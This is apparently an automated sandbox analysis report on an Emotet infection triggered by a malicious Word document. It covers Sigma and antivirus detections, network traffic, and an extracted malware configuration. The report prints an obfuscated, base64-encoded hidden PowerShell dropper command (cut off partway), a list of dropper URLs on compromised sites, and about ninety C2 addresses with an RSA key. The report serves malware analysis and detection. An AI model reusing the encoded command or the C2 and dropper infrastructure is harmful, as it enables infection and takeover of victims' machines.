                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll ShowDialogA, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2360, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dll',#1, ProcessId: 2460
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc IAAgAFMARQBUAC0AaQBUAGUATQAgACAAdgBhAHIASQBhAEIATABFADoAUABHAEIAIAAgACgAIABbAFQAWQBQAGUAXQAoACIAewAyAH0AewA0AH0AewA1AH0AewAxAH0AewAwAH0AewAzAH0AIgAgAC0AZgAnAC4ARABpAHIAJwAsACcAbQAuAEkATwAnACwAJwBTAHkAJwAsACcARQBDAFQAbwBSAHkAJwAsACcAUwB0ACcALAAnAEUAJwApACkAOwAgAHMARQBUACAAKAAnADIAOQB4ACcAKwAnAGQAJwArACcANABNACcAKQAgACAAKAAgAFsAVABZAHAARQBdACgAIgB7ADcAfQB7ADEAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADQAfQB7ADAAfQB7ADUAfQAiACAALQBmACcATgBhACcALAAnAHkAcwAnACwAJwBUAGUATQAuAE4ARQB0ACcALAAnAC4AUwBFAHIAVgBpACcALAAnAGUAUABPAGkAbgBUAG0AQQAnACwAJwBHAGUAUgAnACwAJwBDACcALAAnAHMAJwApACAAIAApADsAJABYAGoAYgA2AHUAdQA5AD0AJABTAF8ANwBXACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABDADkANgBaADsAJABBADIAOQBZAD0AKAAoACcAVAAnACsAJwA2ADUAJwApACsAJwBRACcAKQA7ACAAIAAkAHAAZwBCADoAOgAiAGMAcgBgAEUAYQBUAGAAZQBEAEkAcgBgAEUAYwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwBkAGIAJwArACgAJwB6AFYAbAAnACsAJwBqADAAdABhADAAZAAnACkAKwAnAGIAegAnACsAKAAnAE0AJwArACcAdABrAGQANAAnACsAJwB5ADAAJwApACsAKAAnAGQAYgAnACsAJwB6ACcAKQApAC4AIgByAGAARQBgAFAATABBAGMAZQAiACgAKABbAGMASABhAFIAXQAxADAAMAArAFsAYwBIAGEAUgBdADkAOAArAFsAYwBIAGEAUgBdADEAMgAyACkALAAnAFwAJwApACkAKQA7ACQAWAAxADMASAA9ACgAKAAnAFQAJwArACcANgA2ACcAKQArACcATAAnACkAOwAgACAAKABWAGEAUgBpAEEAQgBMAGUAIAAoACcAMgA5AHgAJwArACcAZAAnACsAJwA0AE0AJwApACAAKQAuAFYAQQBMAHUAZQA6ADoAIgBTAGUAQwBVAFIAYABJAFQAWQBgAFAAYABSAGAATwBUAE8AQwBPAEwAIgAgAD0AIAAoACcAVABsACcAKwAoACcAcwAnACsAJwAxADIAJwApACkAOwAkAEUAMwA0AFEAPQAoACgAJwBRAF8AJwArACcAMQAnACkAKwAnAEwAJwApADsAJABJADMAbABhAGEAMgAzACAAPQAgACgAKAAnAE8AOAAnACsAJwBfACcAKQArACcATgAnACkAOwAkAFcAOQA2AFkAPQAoACgAJwBQACcAKwAnADUAMQAnACkAKwAnAEQAJwApADsAJABJAHEANgByAGYAZwAwAD0AJABIAE8ATQBFACsAKAAoACgAJwBvACcAKwAnADYAbgBWACcAKQArACgAJwBsAGoAMAB0ACcAKwAnAGEAMABvACcAKQArACcANgBuACcAKwAnAE0AdAAnACsAKAAnAGsAZAAnACsAJwA0ACcAKQArACgAJwB5ACcAKwAnADAAbwA2ACcAKQArACcAbgAnACkALQBjAHIARQBQAGwAQQBDAEUAIAAgACgAWwBjAGgAQQByAF0AMQAxADEAKwBbAGMAaABBAHIAXQA1ADQAKwBbAGMAaABBAHIAXQAxADEAMAApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEkAMwBsAGEAYQAyADMAKwAoACcALgAnACsAKAAnAGQAbAAnACsAJwBsACcAKQApADsAJABTADgANABCAD0AKAAnAE8AJwArACgAJwAzADIAJwArACcASQAnACkAKQA7ACQATwB6AHgAOQB4AGsAZAA9ACgAJwBzACcAKwAnAGcAJwArACgAJwAgAHkAdwAnACsAJwAgAGEAJwArACcAaAAnACsAJwA6ACcAKwAnAC8ALwByAGkAYQBuAGQAdQB0ACcAKQArACgAJwByACcAKwAnAGEALgBjAG8AbQAvAGUAJwApACsAJwBtACcAKwAnAGEAJwArACgAJwBpAGwALwAnACsAJwBBACcAKwAnAGYAaABFADgAegAwAC8AJwApACsAKAAnAEAAcwAnACsAJwBnACAAeQB3ACcAKQArACgAJwAgAGEAJwArACcAaAA6ACcAKQArACcALwAvACcAKwAnAGMAJwArACgAJwBhAGwAJwArACcAbABlACcAKwAnAGQAdABvAGMAaAAnACsAJwBhACcAKQArACgAJwBuAGcAZQAnACsAJwAuAG8AcgBnACcAKwAnAC8AQwAnACkAKwAnAGEAJwArACgAJwBsACcAKwAnAGwAZQBkAHQAJwApACsAJwBvACcAKwAnAEMAJwArACcAaAAnACsAKAAnAGEAbgAnACsAJwBnACcAKQArACgAJwBlAC8AOABoAHUAUwAnACsAJwBPACcAKwAnAGQALwAnACkAKwAoACcAQABzACcAKwAnAGcAIAB5AHcAJwApACsAKAAnACAAYQBoACcAKwAnAHMAOgAvACcAKwAnAC8AbQAnACsAJwByAHYAZQBnAGcAeQAuAGMAJwArACcAbwBtAC8AdwBwAC0AYQBkAG0AaQAnACsAJwBuACcAKQArACgAJwAvACcAKwAnAG4ALwBAACcAKQArACcAcwAnACsAKAAnAGcAIAB5AHcAJwArACcAIABhACcAK

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Antivirus detection for URL or domainShow sources
                      Source: https://norailya.com/drupal/retAl/Avira URL Cloud: Label: malware
                      Source: https://www.teelekded.com/cgi-bin/LPo/Avira URL Cloud: Label: malware
                      Source: http://calledtochange.org/CalledtoChange/8huSOd/Avira URL Cloud: Label: malware
                      Source: https://ummahstars.com/app_old_may_2018/assets/wDL8x/Avira URL Cloud: Label: malware
                      Source: https://hbprivileged.com/cgi-bin/Qg/Avira URL Cloud: Label: malware
                      Source: https://www.teelekded.com/cgi-bin/LPo/PAvira URL Cloud: Label: malware
                      Found malware configurationShow sources
                      Source: 16.2.rundll32.exe.1d0000.1.unpackMalware Configuration Extractor: Emotet {"C2 list": ["84.232.229.24:80", "51.255.203.164:8080", "217.160.169.110:8080", "51.15.7.145:80", "177.85.167.10:80", "186.177.174.163:80", "190.114.254.163:8080", "185.183.16.47:80", "149.202.72.142:7080", "181.30.61.163:443", "31.27.59.105:80", "50.28.51.143:8080", "68.183.190.199:8080", "85.214.26.7:8080", "137.74.106.111:7080", "200.75.39.254:80", "85.105.239.184:443", "190.45.24.210:80", "170.81.48.2:80", "109.101.137.162:8080", "110.39.160.38:443", "110.39.162.2:443", "91.233.197.70:80", "51.255.165.160:8080", "213.52.74.198:80", "12.162.84.2:8080", "82.208.146.142:7080", "60.93.23.51:80", "172.245.248.239:8080", "104.131.41.185:8080", "93.149.120.214:80", "81.214.253.80:443", "190.247.139.101:80", "46.105.114.137:8080", "70.32.115.157:8080", "202.134.4.210:7080", "212.71.237.140:8080", "177.23.7.151:80", "111.67.12.221:8080", "197.232.36.108:80", "190.162.232.138:80", "80.15.100.37:80", "95.76.153.115:80", "154.127.113.242:80", "188.225.32.231:7080", "5.196.35.138:7080", "211.215.18.93:8080", "46.101.58.37:8080", "82.48.39.246:80", "181.10.46.92:80", "190.251.216.100:80", "187.162.248.237:80", "191.223.36.170:80", "138.197.99.250:8080", "201.48.121.65:443", "78.206.229.130:80", "190.210.246.253:80", "68.183.170.114:8080", "87.106.46.107:8080", "122.201.23.45:443", "70.32.84.74:8080", "143.0.85.206:7080", "190.64.88.186:443", "217.13.106.14:8080", "93.146.143.191:80", "188.135.15.49:80", "178.211.45.66:8080", "138.97.60.141:7080", "81.17.93.134:80", "83.169.21.32:7080", "152.231.89.226:80", "80.249.176.206:80", "178.250.54.208:8080", "206.189.232.2:8080", "46.43.2.95:8080", "190.24.243.186:80", "105.209.235.113:8080", "62.84.75.50:80", "152.170.79.100:80", "209.236.123.42:8080", "185.94.252.27:443", "12.163.208.58:80", "152.169.22.67:80", "1.226.84.243:8080", "191.241.233.198:80", "94.176.234.118:443", "209.33.120.130:80", "45.16.226.117:443", "81.215.230.173:443", "172.104.169.32:8080", "201.185.69.28:443", "167.71.148.58:443", "192.175.111.212:7080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAOZ9fLJ8UrI0OZURpPsR3eijAyfPj3z6\nuS75f2igmYFW2aWgNcFIzsAYQleKzD0nlCFHOo7Zf8/4wY2UW0CJ4dJEHnE/PHlz\n6uNk3pxjm7o4eCDyiJbzf+k0Azjl0q54FQIDAQAB"}
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: hbprivileged.comVirustotal: Detection: 7%Perma Link
                      Multi AV Scanner detection for dropped fileShow sources
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllMetadefender: Detection: 45%Perma Link
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllReversingLabs: Detection: 85%
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: ARCHIVOFile-20-012021.docVirustotal: Detection: 48%Perma Link
                      Source: ARCHIVOFile-20-012021.docReversingLabs: Detection: 50%
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\Vlj0ta0\Mtkd4y0\O8_N.dllJoe Sandbox ML: detected
                      Source: 10.2.rundll32.exe.6a0000.0.unpackAvira: Label: TR/ATRAPS.Gen

                      Compliance:

                      barindex
                      Uses insecure TLS / SSL version for HTTPS connectionShow sources
                      Source: unknownHTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
                      Uses new MSVCR DllsShow sources
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Binary contains paths to debug symbolsShow sources
                      Source: Binary string: mscorlib.pdb` source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: ws\mscorlib.pdbpdblib.pdbO source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbE source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2107891055.0000000002820000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbles AA source: powershell.exe, 00000005.00000002.2102701692.0000000001F27000.00000004.00000040.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                      Source: global trafficDNS query: name: riandutra.com
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 177.12.170.95:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 191.6.196.95:80

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.22:49175 -> 84.232.229.24:80
                      Source: TrafficSnort IDS: 2404334 ET CNC Feodo Tracker Reported CnC Server TCP group 18 192.168.2.22:49176 -> 51.255.203.164:8080
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 84.232.229.24:80
                      Source: Malware configuration extractorIPs: 51.255.203.164:8080
                      Source: Malware configuration extractorIPs: 217.160.169.110:8080
                      Source: Malware configuration extractorIPs: 51.15.7.145:80
                      Source: Malware configuration extractorIPs: 177.85.167.10:80
                      Source: Malware configuration extractorIPs: 186.177.174.163:80
                      Source: Malware configuration extractorIPs: 190.114.254.163:8080
                      Source: Malware configuration extractorIPs: 185.183.16.47:80
                      Source: Malware configuration extractorIPs: 149.202.72.142:7080
                      Source: Malware configuration extractorIPs: 181.30.61.163:443
                      Source: Malware configuration extractorIPs: 31.27.59.105:80
                      Source: Malware configuration extractorIPs: 50.28.51.143:8080
                      Source: Malware configuration extractorIPs: 68.183.190.199:8080
                      Source: Malware configuration extractorIPs: 85.214.26.7:8080
                      Source: Malware configuration extractorIPs: 137.74.106.111:7080
                      Source: Malware configuration extractorIPs: 200.75.39.254:80
                      Source: Malware configuration extractorIPs: 85.105.239.184:443
                      Source: Malware configuration extractorIPs: 190.45.24.210:80
                      Source: Malware configuration extractorIPs: 170.81.48.2:80
                      Source: Malware configuration extractorIPs: 109.101.137.162:8080
                      Source: Malware configuration extractorIPs: 110.39.160.38:443
                      Source: Malware configuration extractorIPs: 110.39.162.2:443
                      Source: Malware configuration extractorIPs: 91.233.197.70:80
                      Source: Malware configuration extractorIPs: 51.255.165.160:8080
                      Source: Malware configuration extractorIPs: 213.52.74.198:80
                      Source: Malware configuration extractorIPs: 12.162.84.2:8080
                      Source: Malware configuration extractorIPs: 82.208.146.142:7080
                      Source: Malware configuration extractorIPs: 60.93.23.51:80
                      Source: Malware configuration extractorIPs: 172.245.248.239:8080
                      Source: Malware configuration extractorIPs: 104.131.41.185:8080
                      Source: Malware configuration extractorIPs: 93.149.120.214:80
                      Source: Malware configuration extractorIPs: 81.214.253.80:443
                      Source: Malware configuration extractorIPs: 190.247.139.101:80
                      Source: Malware configuration extractorIPs: 46.105.114.137:8080
                      Source: Malware configuration extractorIPs: 70.32.115.157:8080
                      Source: Malware configuration extractorIPs: 202.134.4.210:7080
                      Source: Malware configuration extractorIPs: 212.71.237.140:8080
                      Source: Malware configuration extractorIPs: 177.23.7.151:80
                      Source: Malware configuration extractorIPs: 111.67.12.221:8080
                      Source: Malware configuration extractorIPs: 197.232.36.108:80
                      Source: Malware configuration extractorIPs: 190.162.232.138:80
                      Source: Malware configuration extractorIPs: 80.15.100.37:80
                      Source: Malware configuration extractorIPs: 95.76.153.115:80
                      Source: Malware configuration extractorIPs: 154.127.113.242:80
                      Source: Malware configuration extractorIPs: 188.225.32.231:7080
                      Source: Malware configuration extractorIPs: 5.196.35.138:7080
                      Source: Malware configuration extractorIPs: 211.215.18.93:8080
                      Source: Malware configuration extractorIPs: 46.101.58.37:8080
                      Source: Malware configuration extractorIPs: 82.48.39.246:80
                      Source: Malware configuration extractorIPs: 181.10.46.92:80
                      Source: Malware configuration extractorIPs: 190.251.216.100:80
                      Source: Malware configuration extractorIPs: 187.162.248.237:80
                      Source: Malware configuration extractorIPs: 191.223.36.170:80
                      Source: Malware configuration extractorIPs: 138.197.99.250:8080
                      Source: Malware configuration extractorIPs: 201.48.121.65:443
                      Source: Malware configuration extractorIPs: 78.206.229.130:80
                      Source: Malware configuration extractorIPs: 190.210.246.253:80
                      Source: Malware configuration extractorIPs: 68.183.170.114:8080
                      Source: Malware configuration extractorIPs: 87.106.46.107:8080
                      Source: Malware configuration extractorIPs: 122.201.23.45:443
                      Source: Malware configuration extractorIPs: 70.32.84.74:8080
                      Source: Malware configuration extractorIPs: 143.0.85.206:7080
                      Source: Malware configuration extractorIPs: 190.64.88.186:443
                      Source: Malware configuration extractorIPs: 217.13.106.14:8080
                      Source: Malware configuration extractorIPs: 93.146.143.191:80
                      Source: Malware configuration extractorIPs: 188.135.15.49:80
                      Source: Malware configuration extractorIPs: 178.211.45.66:8080
                      Source: Malware configuration extractorIPs: 138.97.60.141:7080
                      Source: Malware configuration extractorIPs: 81.17.93.134:80
                      Source: Malware configuration extractorIPs: 83.169.21.32:7080
                      Source: Malware configuration extractorIPs: 152.231.89.226:80
                      Source: Malware configuration extractorIPs: 80.249.176.206:80
                      Source: Malware configuration extractorIPs: 178.250.54.208:8080
                      Source: Malware configuration extractorIPs: 206.189.232.2:8080
                      Source: Malware configuration extractorIPs: 46.43.2.95:8080
                      Source: Malware configuration extractorIPs: 190.24.243.186:80
                      Source: Malware configuration extractorIPs: 105.209.235.113:8080
                      Source: Malware configuration extractorIPs: 62.84.75.50:80
                      Source: Malware configuration extractorIPs: 152.170.79.100:80
                      Source: Malware configuration extractorIPs: 209.236.123.42:8080
                      Source: Malware configuration extractorIPs: 185.94.252.27:443
                      Source: Malware configuration extractorIPs: 12.163.208.58:80
                      Source: Malware configuration extractorIPs: 152.169.22.67:80
                      Source: Malware configuration extractorIPs: 1.226.84.243:8080
                      Source: Malware configuration extractorIPs: 191.241.233.198:80
                      Source: Malware configuration extractorIPs: 94.176.234.118:443
                      Source: Malware configuration extractorIPs: 209.33.120.130:80
                      Source: Malware configuration extractorIPs: 45.16.226.117:443
                      Source: Malware configuration extractorIPs: 81.215.230.173:443
                      Source: Malware configuration extractorIPs: 172.104.169.32:8080
                      Source: Malware configuration extractorIPs: 201.185.69.28:443
                      Source: Malware configuration extractorIPs: 167.71.148.58:443
                      Source: Malware configuration extractorIPs: 192.175.111.212:7080
                      Potential dropper URLs found in powershell memoryShow sources
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmpString found in memory: Autoplay,http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=131536-http://go.microsoft.com/fwlink/?LinkId=131535+http://go.microsoft.com/fwlink/?LinkId=8430
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmpString found in memory: PRODUCT_KEY_PROBLEMS$ACTIVATION_TYPE_KEY_FIND_PRODUCT_KEY)ACTIVATION_TYPE_DIFF_KEY_FIND_PRODUCT_KEY+ACTIVATION_CHNG_TO_LICENSE_FIND_PRODUCT_KEYPA,ACTIVATION_PERIOD_EXPIRED_WHAT_IS_ACTIVATION-ACTIVATION_LICENSE_EXPIRED_WHAT_IS_ACTIVATION,ACTIVATION_LICENSE_EXPIRED_PRIVACY_STATEMENTPA,http://go.microsoft.com/fwlink/?LinkID=90983-http://go.microsoft.com/fwlink/?LinkId=123784PA$E77344FA-E978-464C-953E-EBA44F0522670ACTIVATION_ERROR_INSTALLING_REINSTALLING_WINDOWS$f3b8150b-0bd1-4fec-8283-7a1dd45c16377ACTIVATION_ERROR_REINSTALL_WINDOWS_CREATE_RESTORE_POINTPA-http://go.microsoft.com/fwlink/?LinkId=100109-http://go.microsoft.com/fwlink/?LinkId=100096-http://go.microsoft.com/fwlink/?LinkId=120830-http://go.microsoft.com/fwlink/?LinkId=120831,http://go.microsoft.com/fwlink/?LinkId=89429
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Ease of Access Centero<a href="http://go.microsoft.com/fwlink/?linkid=63345">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63353">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63363">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63367">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63370">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63373">Learn about additional assistive technologies online</a>o<a href="http://go.microsoft.com/fwlink/?linkid=63376">Learn about additional assistive technologies online</a>PA!Make your computer easier to use.BGet recommendations to make your computer easier to use (eyesight)CGet recommendations to make your computer easier to use (dexterity)AGet recommendations to make your computer easier to use (hearing)
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Get recommendations to make your computer easier to use (speech)CGet recommendations to make your computer easier to use (cognitive)"Use the computer without a display
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: normal/http://images.metaservices.microsoft.com/cover/6http://redir.metaservices.microsoft.com/redir/buynow/?1http://redir.metaservices.microsoft.com/dvdcover/PA6http://redir.metaservices.microsoft.com/redir/buynow/?,http://windowsmedia.com/redir/findmedia.asp?9http://redir.metaservices.microsoft.com/redir/getmdrdvd/?8http://redir.metaservices.microsoft.com/redir/getmdrcd/?Bhttp://redir.metaservices.microsoft.com/redir/getmdrcdbackground/??http://redir.metaservices.microsoft.com/redir/getmdrcdposturl/?Ihttp://redir.metaservices.microsoft.com/redir/getmdrcdposturlbackground/?=http://redir.metaservices.microsoft.com/redir/getdaiposturl/?:http://redir.metaservices.microsoft.com/redir/daifailure/?
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Microsoft Corporation/(C) Microsoft Corporation. All rights reserved.9http://redir.metaservices.microsoft.com/redir/submittoc/?-http://windowsmedia.com/redir/QueryTOCExt.asp1res://wmploc.dll/Offline_MediaInfo_NowPlaying.htm7http://redir.metaservices.microsoft.com/redir/buynowmg/,http://windowsmedia.com/redir/buyticket9.asp)http://windowsmedia.com/redir/IDPPage.asp)http://windowsmedia.com/redir/IDPLogo.asp
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: AMG Rating: %s stars:http://redir.metaservices.microsoft.com/redir/mediaguide/?9http://redir.metaservices.microsoft.com/redir/radiotuner/,http://windowsmedia.com/redir/QueryTOCNP.asp#Show Video and Visualization Window9http://redir.metaservices.microsoft.com/redir/dvddetails/9http://redir.metaservices.microsoft.com/redir/dvdwizard/?PA
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: Do you want to switch to it now?
                      Source: powershell.exe, 00000005.00000002.2112096741.000000001CE67000.00000002.00000001.sdmpString found in memory: http://www.microsoft.com/windows/windowsmedia/musicservices.aspx?http://redir.metaservices.microsoft.com/redir/allservices/?sv=2?http://redir.metaservices.microsoft.com/redir/allservices/?sv=3?http://redir.metaservices.microsoft.com/redir/allservices/?sv=5PA
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://riandutra.com/email/AfhE8z0/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: http://calledtochange.org/CalledtoChange/8huSOd/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://mrveggy.com/wp-admin/n/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://norailya.com/drupal/retAl/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://hbprivileged.com/cgi-bin/Qg/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://ummahstars.com/app_old_may_2018/assets/wDL8x/
                      Source: powershell.exe, 00000005.00000002.2110898190.0000000003A89000.00000004.00000001.sdmpString found in memory: https://www.teelekded.com/cgi-bin/LPo/
                      Source: global trafficTCP traffic: 192.168.2.22:49176 -> 51.255.203.164:8080
                      Source: global trafficHTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /CalledtoChange/8huSOd/ HTTP/1.1Host: calledtochange.orgConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 191.6.196.95 191.6.196.95
                      Source: Joe Sandbox ViewASN Name: IPV6InternetLtdaBR IPV6InternetLtdaBR
                      Source: Joe Sandbox ViewASN Name: CRYSTALTECHUS CRYSTALTECHUS
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                      Source: unknownHTTPS traffic detected: 177.12.170.95:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: unknownHTTPS traffic detected: 35.163.191.195:443 -> 192.168.2.22:49174 version: TLS 1.0
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 84.232.229.24
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: unknownTCP traffic detected without corresponding DNS query: 51.255.203.164
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5D6EDBE-EB6B-4CC4-8C38-663EBE143117}.tmpJump to behavior
                      Source: global trafficHTTP traffic detected: GET /email/AfhE8z0/ HTTP/1.1Host: riandutra.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /CalledtoChange/8huSOd/ HTTP/1.1Host: calledtochange.orgConnection: Keep-Alive
                      Source: powershell.exe, 00000005.00000002.2111959745.000000001CC80000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2116032570.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2113937687.0000000001F10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2124432058.0000000001D10000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                      Source: powershell.exe, 00000005.00000002.2102409234.000000000029B000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                      Source: unknownDNS traffic detected: queries for: riandutra.com
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Jan 2021 11:17:36 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: 